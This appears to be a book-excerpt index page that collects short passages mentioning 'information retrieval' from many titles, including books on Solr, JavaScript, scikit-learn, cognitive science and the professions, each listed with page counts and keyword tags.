We e-mailed some mailing lists. We e-mailed the ISMIR2 mailing list. They're a group who meet every year about music recommendations and information retrieval in music. We ended up hiring a guy called Norman, who was both a great scientist and understood all the algorithms and captive audience sort of things, but also an excellent programmer who was able to implement all these ideas. So we got really lucky. The first person we hired was great and he just took over. He chucked out all of our crappy recommendation systems we had and built something good, and then improved it constantly for the next several years. __________ 2 The International Society for Music Information Retrieval So we had some A/B testing, split testing systems in there for the radio so they could try out new tweaks to the algorithms and see what was performing better.


pages: 648 words: 108,814

Solr 1.4 Enterprise Search Server by David Smiley, Eric Pugh

Amazon Web Services, bioinformatics, cloud computing, continuous integration, database schema, domain-specific language, en.wikipedia.org, fault tolerance, Firefox, information retrieval, Ruby on Rails, web application, Y Combinator

The major features found in Lucene are as follows:
• A text-based inverted index persistent storage for efficient retrieval of documents by indexed terms
• A rich set of text analyzers to transform a string of text into a series of terms (words), which are the fundamental units indexed and searched
• A query syntax with a parser and a variety of query types from a simple term lookup to exotic fuzzy matches
• A good scoring algorithm based on sound Information Retrieval (IR) principles to produce the more likely candidates first, with flexible means to affect the scoring
• A highlighter feature to show words found in context
• A query spellchecker based on indexed content
For even more information on the query spellchecker, check out the Lucene In Action book (LINA for short) by Erik Hatcher and Otis Gospodnetić. Solr, the Server-ization of Lucene With the definition of Lucene behind us, Solr can be described succinctly as the server-ization of Lucene.
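The "sound Information Retrieval principles" behind the scoring feature above can be illustrated with the classic tf-idf weighting: documents rank higher when they contain query terms often (tf) and those terms are rare across the collection (idf). This is a toy formulation for illustration, not Lucene's actual similarity implementation.

```python
# Toy tf-idf ranking: score(doc, query) = sum over query terms of tf * idf.
import math
from collections import Counter

docs = {
    "d1": "solr is a search server built on lucene",
    "d2": "lucene is a java search library",
    "d3": "gardening tips for spring",
}
tokenized = {d: text.split() for d, text in docs.items()}

def idf(term):
    # Rare terms get large weights; terms in every document get small ones.
    n = sum(term in toks for toks in tokenized.values())
    return math.log(len(tokenized) / n) if n else 0.0

def score(doc, query):
    tf = Counter(tokenized[doc])
    return sum(tf[t] * idf(t) for t in query.split())

# The Lucene-related documents outscore the unrelated one for this query:
print(score("d1", "lucene search") > score("d3", "lucene search"))  # True
```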



pages: 913 words: 265,787

How the Mind Works by Steven Pinker

affirmative action, agricultural Revolution, Alfred Russel Wallace, Buckminster Fuller, cognitive dissonance, Columbine, combinatorial explosion, complexity theory, computer age, computer vision, Daniel Kahneman / Amos Tversky, delayed gratification, double helix, experimental subject, feminist movement, four colour theorem, Gordon Gekko, greed is good, hedonic treadmill, Henri Poincaré, income per capita, information retrieval, invention of agriculture, invention of the wheel, Johannes Kepler, John von Neumann, lake wobegon effect, lateral thinking, Machine translation of "The spirit is willing, but the flesh is weak." to Russian and back, Mikhail Gorbachev, Murray Gell-Mann, mutually assured destruction, Necker cube, out of africa, pattern recognition, phenotype, plutocrats, Plutocrats, random walk, Richard Feynman, Ronald Reagan, Rubik’s Cube, Saturday Night Live, scientific worldview, Search for Extraterrestrial Intelligence, sexual politics, social intelligence, Steven Pinker, theory of mind, Thorstein Veblen, Turing machine, urban decay, Yogi Berra

The psychologist John Anderson has reverse-engineered human memory retrieval, and has shown that the limits of memory are not a byproduct of a mushy storage medium. As programmers like to say, “It’s not a bug, it’s a feature.” In an optimally designed information-retrieval system, an item should be recovered only when the relevance of the item outweighs the cost of retrieving it. Anyone who has used a computerized library retrieval system quickly comes to rue the avalanche of titles spilling across the screen. A human expert, despite our allegedly feeble powers of retrieval, vastly outperforms any computer in locating a piece of information from its content. When I need to find articles on a topic in an unfamiliar field, I don’t use the library computer; I send email to a pal in the field. What would it mean for an information-retrieval system to be optimally designed? It should cough up the information most likely to be useful at the time of the request.

A piece of information that has been requested many times in the past is more likely to be needed now than a piece that has been requested only rarely. A piece that has been requested recently is more likely to be needed now than a piece that has not been requested for a while. An optimal information-retrieval system should therefore be biased to fetch frequently and recently encountered items. Anderson notes that that is exactly what human memory retrieval does: we remember common and recent events better than rare and long-past events. He found four other classic phenomena in memory research that meet the optimal design criteria independently established for computer information-retrieval systems. A third notable feature of access-consciousness is the emotional coloring of experience. We not only register events but register them as pleasurable or painful. That makes us take steps to have more of the former and less of the latter, now and in the future.
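Anderson's frequency-and-recency bias can be mocked up as a toy retrieval score (the exponential-decay weighting below is an invented stand-in for illustration, not Anderson's actual model):

```python
import math

# Toy sketch of a retrieval policy biased toward frequently and recently
# requested items: each past request leaves a trace that decays with age,
# and an item's "need" is the sum of its surviving traces.
def need_score(request_times, now, decay=0.5):
    """Sum of decaying traces; recent and repeated requests score higher."""
    return sum(math.exp(-decay * (now - t)) for t in request_times)

# Item A: requested often and recently. Item B: requested once, long ago.
a = need_score(request_times=[1, 5, 9], now=10)
b = need_score(request_times=[1], now=10)
print(a > b)  # True -- an optimal system fetches A first
```

Under this rule, both more requests and more recent requests raise the score, which is exactly the bias the passage describes.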


Bookkeeping the Easy Way by Wallace W. Kravitz

double entry bookkeeping, information retrieval, post-work, profit motive

Kravitz Former Business Education Chairman Mineola High School Mineola, New York In this book the names of individuals and companies and their types of businesses are fictitious. Any similarity with the names and types of business of a real person or company is purely coincidental. © Copyright 1999 by Barron's Educational Series, Inc. Prior © copyrights 1990, 1983 by Barron's Educational Series, Inc. All rights reserved. No part of this book may be reproduced in any form, by photostat, microfilm, xerography, or any other means, or incorporated into any information retrieval system, electronic or mechanical, without the written permission of the copyright owner. All inquiries should be addressed to: Barron's Educational Series, Inc. 250 Wireless Boulevard Hauppauge, NY 11788 http://www.barronseduc.com Library of Congress Catalog Card No. 99-17245 International Standard Book No. 0-7641-1079-9 Library of Congress Cataloging-in-Publication Data Kravitz, Wallace W.


pages: 429 words: 114,726

The Computer Boys Take Over: Computers, Programmers, and the Politics of Technical Expertise by Nathan L. Ensmenger

barriers to entry, business process, Claude Shannon: information theory, computer age, deskilling, Donald Knuth, Firefox, Frederick Winslow Taylor, future of work, Grace Hopper, informal economy, information retrieval, interchangeable parts, Isaac Newton, Jacquard loom, job satisfaction, John von Neumann, knowledge worker, loose coupling, new economy, Norbert Wiener, pattern recognition, performance metric, Philip Mirowski, post-industrial society, Productivity paradox, RAND corporation, Robert Gordon, Shoshana Zuboff, sorting algorithm, Steve Jobs, Steven Levy, the market place, Thomas Kuhn: the structure of scientific revolutions, Thorstein Veblen, Turing machine, Von Neumann architecture, Y2K

Mahoney, “Computer Science.” 79. Daniel McCracken, “The Human Side of Computing,” Datamation 7, no. 1 (1961): 9–11. Chapter 6 1. “The Thinking Machine,” Time magazine, January 23, 1950, 54–60. 2. J. Lear, “Can a Mechanical Brain Replace You?” Colliers, no. 131 (1953), 58–63. 3. “Office Robots,” Fortune 45 (January 1952), 82–87, 112, 114, 116, 118. 4. Cheryl Knott Malone, “Imagining Information Retrieval in the Library: Desk Set in Historical Context,” IEEE Annals of the History of Computing 24, no. 3 (2002): 14–22. 5. Ibid. 6. Ibid. 7. Thorstein Veblen, The Theory of the Leisure Class (New York: McMillan, 1899). 8. Thomas Haigh, “The Chromium-Plated Tabulator: Institutionalizing an Electronic Revolution, 1954–1958,” IEEE Annals of the History of Computing 4, no. 23 (2001), 75–104. 9.

New York: Oxford University Press, 2002. Mahoney, Michael. “Software as Science—Science as Software.” In History of Computing: Software Issues, ed. Ulf Hashagen, Reinhard Keil-Slawik, and Arthur Norberg. Berlin: Springer-Verlag, 2002, 25–48. Mahoney, Michael. “What Makes the History of Software Hard.” IEEE Annals of the History of Computing 30 (3) (2008): 8–18. Malone, Cheryl Knott. “Imagining Information Retrieval in the Library: Desk Set in Historical Context.” IEEE Annals of the History of Computing 24 (3) (2002): 14–22. Mandel, Lois. “The Computer Girls.” Cosmopolitan, April 1967, 52–56. Manion, Mark, and William M. Evan. “The Y2K problem: technological risk and professional responsibility.” ACM SIGCAS Computers and Society 29 (4) (1999): 24–29. Markham, Edward. “EDP Schools: An Inside View.”


pages: 924 words: 196,343

JavaScript & jQuery: The Missing Manual by David Sawyer McFarland

Firefox, framing effect, HyperCard, information retrieval, Ruby on Rails, Steve Jobs, web application

In order to add intelligence to your web pages so they can respond to your site’s visitors, you need JavaScript. JavaScript lets a web page react intelligently. With it, you can create smart web forms that let visitors know when they’ve forgotten to include necessary information; you can make elements appear, disappear, or move around a web page (see Figure 1-1); you can even update the contents of a web page with information retrieved from a web server—without having to load a new web page. In short, JavaScript lets you make your websites more engaging and effective. Figure 1-1. JavaScript lets web pages respond to visitors. On Amazon.com, mousing over the “Gifts & Wish Lists” link opens a tab that floats above the other content on the page and offers additional options. Note Actually, HTML5 does add some smarts to HTML–including basic form validation.

It can be as simple as this: { firstName : 'Bob', lastName : 'Smith' } In this code, firstName acts like a key with a value of Bob—a simple string value. However, the value can also be another object (see Figure 11-10 on page 376), so you can often end up with a complex nested structure—like dolls within dolls. That’s what Flickr’s JSON feed is like. Here’s a small snippet of one of those feeds. It shows the information retrieved for two photos:

{
  "title": "Uploads from Smithsonian Institution",
  "link": "http://www.flickr.com/photos/smithsonian/",
  "description": "",
  "modified": "2011-08-11T13:16:37Z",
  "generator": "http://www.flickr.com/",
  "items": [
    {
      "title": "East Island, June 12, 1966.",
      "link": "http://www.flickr.com/photos/smithsonian/5988083516/",
      "media": {"m":"http://farm7.static.flickr.com/6029/5988083516_bfc9f41286_m.jpg"},
      "date_taken": "2011-07-29T11:45:50-08:00",
      "description": "Short description here",
      "published": "2011-08-11T13:16:37Z",
      "author": "nobody@flickr.com (Smithsonian Institution)",
      "author_id": "25053835@N03",
      "tags": "ocean birds redfootedbooby"
    },
    {
      "title": "Phoenix Island, April 15, 1966

You might add some code in your program to do that like this: $('.weed').click(function() { $(this).remove(); }); // end click The problem with this code is that it only applies to elements that already exist. If you programmatically add new divs—<div class=“weed”>—the click handler isn’t applied to them. Code that applies only to existing elements is also a problem when you use Ajax as described in Part Four of this book. Ajax lets you update content on a page using information retrieved from a web server. Gmail, for example, can display new mail as you receive it by continually retrieving it from a web server and updating the content in the web browser. In this case, your list of received emails changes after you first started using Gmail. Any events that were applied to the page content when the page loads won’t apply to the new content added from the server. You can reapply event handlers whenever the page is updated, but this method is slow and inefficient.
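The delegation fix jQuery offers for this (binding via `.on()` on a stable ancestor) rests on event bubbling. A framework-free sketch of the mechanism, using a made-up mini-DOM so it runs outside a browser, might look like this:

```javascript
// Why delegation survives dynamically added elements, sketched without a
// real DOM. (In jQuery the delegated form is roughly:
//   $(document).on('click', '.weed', handler);
// the mini-DOM below is invented for illustration.)

// Minimal stand-in for DOM nodes: a class name, a parent, and handlers.
function makeNode(className, parent) {
  return { className, parent, handlers: [] };
}

// Direct binding, like $('.weed').click(fn): attaches only to nodes
// that exist right now.
function bindDirect(node, handler) {
  node.handlers.push(handler);
}

// Delegated binding: attach to a stable ancestor and filter by class
// when the event arrives, so future descendants are covered too.
function bindDelegated(ancestor, className, handler) {
  ancestor.handlers.push(ev => {
    if (ev.target.className === className) handler(ev);
  });
}

// Dispatch with bubbling: run handlers on the target, then each ancestor.
function dispatch(target) {
  const ev = { target };
  for (let node = target; node !== null; node = node.parent) {
    node.handlers.forEach(h => h(ev));
  }
}

const root = makeNode('root', null);
const delegatedHits = [];
bindDelegated(root, 'weed', ev => delegatedHits.push(ev.target));

// An element added *after* binding is still handled via delegation,
// because its click bubbles up to the ancestor that holds the handler.
const lateWeed = makeNode('weed', root);
dispatch(lateWeed);
console.log(delegatedHits.length); // 1
```

A handler bound directly to the original `.weed` elements would never fire for `lateWeed`, which is precisely the failure mode the paragraph describes.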


Scikit-Learn Cookbook by Trent Hauck

bioinformatics, computer vision, information retrieval, p-value

This will tell us which points should be associated with which clusters: >>> labels = k_means.labels_ >>> labels[:5] array([1, 1, 1, 1, 1], dtype=int32) At this point, we require the simplest of NumPy array manipulation followed by a bit of reshaping, and we'll have the new image: >>> plt.imshow(centers[labels].reshape(x, y, z)) The following is the resultant image: Finding the closest objects in the feature space Sometimes, the easiest thing to do is to just find the distance between two objects. We just need to find some distance metric, compute the pairwise distances, and compare the outcomes to what's expected. Getting ready A lower-level utility in scikit-learn is sklearn.metrics.pairwise. This contains several functions to compute the distances between the vectors in a matrix X or the distances between the vectors in X and Y easily. This can be useful for information retrieval. For example, given a set of customers with attributes of X, we might want to take a reference customer and find the closest customers to this customer. In fact, we might want to rank customers by the notion of similarity measured by a distance function. The quality of the similarity depends upon the feature space selection as well as any transformation we might do on the space. We'll walk through several different scenarios of measuring distance.
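The "closest customers" ranking idea can be sketched with plain NumPy in place of sklearn.metrics.pairwise (the customer data here is invented):

```python
import numpy as np

# Sketch: rank customers by Euclidean distance to a reference customer.
# sklearn.metrics.pairwise offers this as pairwise_distances; the same
# computation in bare NumPy makes the idea explicit.
rng = np.random.default_rng(0)
X = rng.normal(size=(5, 3))   # 5 customers, 3 attributes each (made up)
ref = X[0]                    # the reference customer

# Distance from the reference to every row of X.
dists = np.sqrt(((X - ref) ** 2).sum(axis=1))

# Rank customers by similarity: smallest distance first.
ranking = np.argsort(dists)
print(ranking[0])  # 0 -- the reference is trivially closest to itself
```

The choice of metric and any feature-space transformation (scaling, projection) change the ranking, which is the point the recipe goes on to explore.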


pages: 742 words: 137,937

The Future of the Professions: How Technology Will Transform the Work of Human Experts by Richard Susskind, Daniel Susskind

23andMe, 3D printing, additive manufacturing, AI winter, Albert Einstein, Amazon Mechanical Turk, Amazon Web Services, Andrew Keen, Atul Gawande, Automated Insights, autonomous vehicles, Big bang: deregulation of the City of London, big data - Walmart - Pop Tarts, Bill Joy: nanobots, business process, business process outsourcing, Cass Sunstein, Checklist Manifesto, Clapham omnibus, Clayton Christensen, clean water, cloud computing, commoditize, computer age, Computer Numeric Control, computer vision, conceptual framework, corporate governance, creative destruction, crowdsourcing, Daniel Kahneman / Amos Tversky, death of newspapers, disintermediation, Douglas Hofstadter, en.wikipedia.org, Erik Brynjolfsson, Filter Bubble, full employment, future of work, Google Glasses, Google X / Alphabet X, Hacker Ethic, industrial robot, informal economy, information retrieval, interchangeable parts, Internet of things, Isaac Newton, James Hargreaves, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, Joseph Schumpeter, Khan Academy, knowledge economy, lifelogging, lump of labour, Marshall McLuhan, Metcalfe’s law, Narrative Science, natural language processing, Network effects, optical character recognition, Paul Samuelson, personalized medicine, pre–internet, Ray Kurzweil, Richard Feynman, Second Machine Age, self-driving car, semantic web, Shoshana Zuboff, Skype, social web, speech recognition, spinning jenny, strong AI, supply-chain management, telepresence, The Future of Employment, the market place, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, transaction costs, Turing test, Watson beat the top human players on Jeopardy!, WikiLeaks, young professional

For us, it represents the coming of the second wave of AI (section 4.9). Here is a system that undoubtedly performs tasks that we would normally think require human intelligence. The version of Watson that competed on Jeopardy! holds over 200 million pages of documents and implements a wide range of AI tools and techniques, including natural language processing, machine learning, speech synthesis, game-playing, information retrieval, intelligent search, knowledge processing and reasoning, and much more. This type of AI, we stress again, is radically different from the first wave of rule-based expert systems of the 1980s (see section 4.9). It is interesting to note, harking back again to the exponential growth of information technology, that the hardware on which Watson ran in 2011 was said to be about the size of the average bedroom.

It has instead been hibernating, conserving its energy, as it were, ticking over quietly in the background, waiting for enabling technologies to emerge and catch up with some of the original aspirations of the early AI scientists. In the thaw that has followed the winter, over the past few years, we have seen a series of significant developments—Big Data, Watson, robotics, and affective computing—that we believe point to a second wave of AI. In summary, the computerization of the work of professionals began in earnest in the late 1970s with information retrieval systems. Then, in the 1980s, there were first-generation AI systems in the professions, whose main focus was expert systems technologies. In the next decade, the 1990s, there was a shift towards the field of knowledge management, when professionals started to store and retrieve not just source materials but know-how and working practices. In the 2000s, Google came to dominate the research habits of many professionals, and grew to become the indispensable tool of practitioners searching for materials, if not for solutions.


pages: 165 words: 50,798

Intertwingled: Information Changes Everything by Peter Morville

A Pattern Language, Airbnb, Albert Einstein, Arthur Eddington, augmented reality, Bernie Madoff, Black Swan, business process, Cass Sunstein, cognitive dissonance, collective bargaining, disruptive innovation, index card, information retrieval, Internet of things, Isaac Newton, iterative process, Jane Jacobs, John Markoff, Lean Startup, Lyft, minimum viable product, Mother of all demos, Nelson Mandela, Paul Graham, peer-to-peer, RFID, Richard Thaler, ride hailing / ride sharing, Schrödinger's Cat, self-driving car, semantic web, sharing economy, Silicon Valley, Silicon Valley startup, source of truth, Steve Jobs, Stewart Brand, Ted Nelson, The Death and Life of Great American Cities, the scientific method, The Wisdom of Crowds, theory of mind, uber lyft, urban planning, urban sprawl, Vannevar Bush, zero-sum game

That question sent me to graduate school at the University of Michigan. In 1992, I started classes at the School of Information and Library Studies, and promptly began to panic. I was stuck in required courses like Reference and Cataloging with people who wanted to be librarians. In hindsight, I’m glad I took those classes, but at the time I was convinced I’d made a very big mistake. It took a while to find my groove. I studied information retrieval and database design. I explored Dialog, the world’s first commercial online search service. And I fell madly in love with the Internet. The tools were crude, the content sparse, but the promise irresistible. A global network of networks that provides universal access to ideas and information: how could anyone who loves knowledge resist that? I was hooked. I dedicated myself to “the design of information systems.”


pages: 170 words: 49,193

The People vs Tech: How the Internet Is Killing Democracy (And How We Save It) by Jamie Bartlett

Ada Lovelace, Airbnb, Amazon Mechanical Turk, Andrew Keen, autonomous vehicles, barriers to entry, basic income, Bernie Sanders, bitcoin, blockchain, Boris Johnson, central bank independence, Chelsea Manning, cloud computing, computer vision, creative destruction, cryptocurrency, Daniel Kahneman / Amos Tversky, Dominic Cummings, Donald Trump, Edward Snowden, Elon Musk, Filter Bubble, future of work, gig economy, global village, Google bus, hive mind, Howard Rheingold, information retrieval, Internet of things, Jeff Bezos, job automation, John Maynard Keynes: technological unemployment, Julian Assange, manufacturing employment, Mark Zuckerberg, Marshall McLuhan, Menlo Park, meta-analysis, mittelstand, move fast and break things, Network effects, Nicholas Carr, off grid, Panopticon Jeremy Bentham, payday loans, Peter Thiel, prediction markets, QR code, ransomware, Ray Kurzweil, recommendation engine, Renaissance Technologies, ride hailing / ride sharing, Robert Mercer, Ross Ulbricht, Sam Altman, Satoshi Nakamoto, Second Machine Age, sharing economy, Silicon Valley, Silicon Valley ideology, Silicon Valley startup, smart cities, smart contracts, smart meter, Snapchat, Stanford prison experiment, Steve Jobs, Steven Levy, strong AI, TaskRabbit, technological singularity, technoutopianism, Ted Kaczynski, the medium is the message, the scientific method, The Spirit Level, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, theory of mind, too big to fail, ultimatum game, universal basic income, WikiLeaks, World Values Survey, Y Combinator

Over the past few years, big tech firms have bought promising AI start-ups by the truckload. Google’s DeepMind is one of only a dozen they have recently acquired. Apple splashed out $200 million for Turi, a machine learning start-up, in 2016, and Intel has invested over $1 billion in AI companies over the past couple of years.7 Market leaders in AI like Google, with the data, the geniuses, the experience and the computing power, won’t be limited to just search and information retrieval. They will also be able to leap ahead in almost anything where AI is important: logistics, driverless cars, medical research, television, factory production, city planning, agriculture, energy use, storage, clerical work, education and who knows what else. Amazon is already a retailer, marketing platform, delivery and logistics network, payment system, credit lender, auction house, book publisher, TV production company, fashion designer and cloud computing provider.8 What next?


pages: 286 words: 94,017

Future Shock by Alvin Toffler

Albert Einstein, Brownian motion, Buckminster Fuller, Charles Lindbergh, cognitive dissonance, Colonization of Mars, corporate governance, East Village, global village, Haight Ashbury, information retrieval, invention of agriculture, invention of movable type, invention of writing, longitudinal study, Marshall McLuhan, mass immigration, Menlo Park, New Urbanism, Norman Mailer, post-industrial society, RAND corporation, social intelligence, the market place, Thomas Kuhn: the structure of scientific revolutions, urban renewal, Whole Earth Catalog, zero-sum game

The profession of airline flight engineer, he notes, emerged and then began to die out within a brief period of fifteen years. A look at the "help wanted" pages of any major newspaper brings home the fact that new occupations are increasing at a mind-dazzling rate. Systems analyst, console operator, coder, tape librarian, tape handler, are only a few of those connected with computer operations. Information retrieval, optical scanning, thin-film technology all require new kinds of expertise, while old occupations lose importance or vanish altogether. When Fortune magazine in the mid-1960's surveyed 1,003 young executives employed by major American corporations, it found that fully one out of three held a job that simply had not existed until he stepped into it. Another large group held positions that had been filled by only one incumbent before them.

Just as economic mass production required large numbers of workers to be assembled in factories, educational mass production required large numbers of students to be assembled in schools. This itself, with its demands for uniform discipline, regular hours, attendance checks and the like, was a standardizing force. Advanced technology will, in the future, make much of this unnecessary. A good deal of education will take place in the student's own room at home or in a dorm, at hours of his own choosing. With vast libraries of data available to him via computerized information retrieval systems, with his own tapes and video units, his own language laboratory and his own electronically equipped study carrel, he will be freed, for much of the time, of the restrictions and unpleasantness that dogged him in the lockstep classroom. The technology upon which these new freedoms will be based will inevitably spread through the schools in the years ahead—aggressively pushed, no doubt, by major corporations like IBM, RCA, and Xerox.


pages: 573 words: 157,767

From Bacteria to Bach and Back: The Evolution of Minds by Daniel C. Dennett

Ada Lovelace, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Andrew Wiles, Bayesian statistics, bioinformatics, bitcoin, Build a better mousetrap, Claude Shannon: information theory, computer age, computer vision, double entry bookkeeping, double helix, Douglas Hofstadter, Elon Musk, epigenetics, experimental subject, Fermat's Last Theorem, Gödel, Escher, Bach, information asymmetry, information retrieval, invention of writing, Isaac Newton, iterative process, John von Neumann, Menlo Park, Murray Gell-Mann, Necker cube, Norbert Wiener, pattern recognition, phenotype, Richard Feynman, Rodney Brooks, self-driving car, social intelligence, sorting algorithm, speech recognition, Stephen Hawking, Steven Pinker, strong AI, The Wealth of Nations by Adam Smith, theory of mind, Thomas Bayes, trickle-down economics, Turing machine, Turing test, Watson beat the top human players on Jeopardy!, Y2K

Perception & Psychophysics 58 (6): 927–935. Lewis, S. M., and C. K. Cratsley. 2008. “Flash Signal Evolution, Mate Choice and Predation in Fireflies.” Annual Review of Entomology 53: 293–321. Lieberman, Matthew D. 2013. Social: Why Our Brains Are Wired to Connect. New York: Crown. Littman, Michael L., Susan T. Dumais, and Thomas K. Landauer. 1998. “Automatic Cross-Language Information Retrieval Using Latent Semantic Indexing.” In Cross-Language Information Retrieval, 51–62. New York: Springer. Lycan, William G. 1987. Consciousness. Cambridge, Mass.: MIT Press. MacCready, P. 1999. “An Ambivalent Luddite at a Technological Feast.” Designfax, August. MacKay, D. M. 1968. “Electroencephalogram Potentials Evoked by Accelerated Visual Motion.” Nature 217: 677–678. Markkula, G. 2015. “Answering Questions about Consciousness by Modeling Perception as Covert Behavior.”


Principles of Protocol Design by Robin Sharp

accounting loophole / creative accounting, business process, discrete time, fault tolerance, finite state, Gödel, Escher, Bach, information retrieval, loose coupling, MITM: man-in-the-middle, packet switching, RFC: Request For Comment, stochastic process

Specification of acceptable message types, languages, content encodings, character sets. Challenge-response mechanism for authentication of client (see Section 11.4.4). Coding: ASCII encoding of all PDUs. Addressing: Uniform Resource Identifier (URI) identifies destination system and path to resource. Fault tolerance: Resistance to corruption via optional MD5 checksumming of resource content during transfer. 11.4.3 Web Caching Since most distributed information retrieval applications involve transfer of considerable amounts of data through the network, caching is commonly used in order to reduce the amount of network traffic and reduce response times. HTTP, which is intended to support such applications, therefore includes explicit mechanisms for controlling the operation of caching. Since these illustrate a number of ideas which are important in several application areas, they will be described in some detail here.
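The freshness check that HTTP caching relies on can be sketched roughly as follows (a simplified reading of the max-age directive; the header values are invented for illustration):

```python
import email.utils
import time

# Toy freshness check in the spirit of HTTP caching: a cached response
# may be reused without contacting the server while its age (time since
# the Date header) is below the Cache-Control max-age value.
def is_fresh(response_headers, now=None):
    """Return True if a cached response may be reused without revalidation."""
    now = time.time() if now is None else now
    cache_control = response_headers.get("Cache-Control", "")
    max_age = None
    for directive in cache_control.split(","):
        directive = directive.strip()
        if directive.startswith("max-age="):
            max_age = int(directive.split("=", 1)[1])
    if max_age is None:
        return False  # no freshness info: fall back to revalidation
    date = email.utils.parsedate_to_datetime(response_headers["Date"])
    age = now - date.timestamp()
    return age < max_age

headers = {"Cache-Control": "public, max-age=3600",
           "Date": email.utils.formatdate(usegmt=True)}
print(is_fresh(headers))  # True -- just fetched, well within max-age
```

Real HTTP caching adds validators (ETag, Last-Modified) and conditional requests on top of this, which is why the protocol's explicit cache-control mechanisms repay the detailed treatment the section gives them.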

A good review of coordination languages and the protocols used to implement them can be found in the monograph edited by Omicini et al. [103], while Baumann [6] gives a good overview of the technologies behind mobile agents. The proceedings of the two series of international workshops on “Intelligent Agents for Telecommunication Applications”, and on “Cooperative Information Agents” are good places to search for the results of recent research into both theory and applications of agents in the telecommunications and information retrieval areas. A new trend in the construction of very large distributed systems is to base them on Grid technology. This is a technology for coordinating the activities of a potentially huge number of computers, in order to supply users with computer power, in the form of CPU power, storage and other resources. The analogy is to the electric grid, which provides users with electric power without their having to think about exactly where it comes from.


pages: 501 words: 145,943

If Mayors Ruled the World: Dysfunctional Nations, Rising Cities by Benjamin R. Barber

Affordable Care Act / Obamacare, American Legislative Exchange Council, Berlin Wall, bike sharing scheme, borderless world, Boris Johnson, Bretton Woods, British Empire, car-free, carbon footprint, Cass Sunstein, Celebration, Florida, clean water, corporate governance, crowdsourcing, David Brooks, desegregation, Detroit bankruptcy, digital Maoism, disintermediation, edge city, Edward Glaeser, Edward Snowden, Etonian, failed state, Fall of the Berlin Wall, feminist movement, Filter Bubble, George Gilder, ghettoisation, global pandemic, global village, Hernando de Soto, Howard Zinn, illegal immigration, In Cold Blood by Truman Capote, income inequality, informal economy, information retrieval, Jane Jacobs, Jaron Lanier, Jeff Bezos, London Interbank Offered Rate, Mark Zuckerberg, market fundamentalism, Marshall McLuhan, Masdar, megacity, microcredit, Mikhail Gorbachev, mortgage debt, mutually assured destruction, new economy, New Urbanism, Nicholas Carr, Norman Mailer, nuclear winter, obamacare, Occupy movement, Panopticon Jeremy Bentham, Peace of Westphalia, Pearl River Delta, peer-to-peer, planetary scale, plutocrats, Plutocrats, profit motive, Ralph Waldo Emerson, RFID, Richard Florida, Ronald Reagan, self-driving car, Silicon Valley, Skype, smart cities, smart meter, Steve Jobs, Stewart Brand, Telecommunications Act of 1996, The Death and Life of Great American Cities, The Fortune at the Bottom of the Pyramid, The Wealth of Nations by Adam Smith, Tobin tax, Tony Hsieh, trade route, UNCLOS, unpaid internship, urban sprawl, War on Poverty, zero-sum game

I myself was fascinated when, nearly thirty years ago, I enthused about emerging interactive technologies and the impact they might have on citizenship and “strong democracy”: The wiring of homes for cable television across America . . . the availability of low frequency and satellite transmissions in areas beyond regular transmission or cable and the interactive possibilities of video, computers, and information retrieval systems open up a new mode of human communication that can be used either in civic and constructive ways or in manipulative and destructive ways.19 Mine was one of the earliest instances of anticipatory enthusiasm (though laced with skepticism), but a decade later with the web actually in development, cyber zealots were everywhere predicting a new electronic frontier for civic interactivity.

—than the founders and CEOs of immensely powerful tech firms that are first of all profit-seeking, market-monopolizing, consumer-craving commercial entities no more virtuous (or less virtuous) than oil or tobacco or weapons manufacturing firms. It should not really be a surprise that Apple will exploit cheap labor at its Foxconn subsidiary glass manufacturer in China or that Google will steer to the wind, allowing states like China to dictate the terms of “information retrieval” in their own domains. Or that the World Wide Web is being called the “walled-wide-web” by defenders of an open network who fear they are losing the battle. Dictators, nowadays mostly faltering or gone, are no longer the most potent threat to democracy: robust corporations are, not because they are enemies of popular sovereignty but because court decisions like Buckley v. Valeo and Citizens United have allowed them to shape and control popular sovereignty to advance their own interests.


pages: 189 words: 57,632

Content: Selected Essays on Technology, Creativity, Copyright, and the Future of the Future by Cory Doctorow

AltaVista, book scanning, Brewster Kahle, Burning Man, en.wikipedia.org, informal economy, information retrieval, Internet Archive, invention of movable type, Jeff Bezos, Law of Accelerating Returns, Metcalfe's law, Mitch Kapor, moral panic, mutually assured destruction, new economy, optical character recognition, patent troll, pattern recognition, peer-to-peer, Ponzi scheme, post scarcity, QWERTY keyboard, Ray Kurzweil, RFID, Sand Hill Road, Skype, slashdot, social software, speech recognition, Steve Jobs, Thomas Bayes, Turing test, Vernor Vinge

This sort of observational metadata is far more reliable than the stuff that human beings create for the purposes of having their documents found. It cuts through the marketing bullshit, the self-delusion, and the vocabulary collisions. Taken more broadly, this kind of metadata can be thought of as a pedigree: who thinks that this document is valuable? How closely correlated have this person's value judgments been with mine in times gone by? This kind of implicit endorsement of information is a far better candidate for an information-retrieval panacea than all the world's schema combined. Amish for QWERTY (Originally published on the O'Reilly Network, 07/09/2003) I learned to type before I learned to write. The QWERTY keyboard layout is hard-wired to my brain, such that I can't write anything of significance without that I have a 101-key keyboard in front of me. This has always been a badge of geek pride: unlike the creaking pen-and-ink dinosaurs that I grew up reading, I'm well adapted to the modern reality of technology.


pages: 144 words: 55,142

Interlibrary Loan Practices Handbook by Cherie L. Weible, Karen L. Janke

Firefox, information retrieval, Internet Archive, late fees, optical character recognition, pull request, QR code, transaction costs, Works Progress Administration

If an electronic resources management system is not available or used, it is important to find the interlibrary loan terms on a license and record this information in the ILL department. The terms of the license should be upheld. Regular communication with library staff who are responsible for licensing will ensure that ILL staff are aware of any new or updated license information. Retrieving the Item If the print item is owned and available, the call number or other location-specific information should be noted on the request. Borrowers might request a particular edition or year, so careful attention should be paid to make sure the call number and item are an exact match. All requests should be collected and sorted by location and the items pulled from the stacks at least daily.


pages: 190 words: 62,941

Wild Ride: Inside Uber's Quest for World Domination by Adam Lashinsky

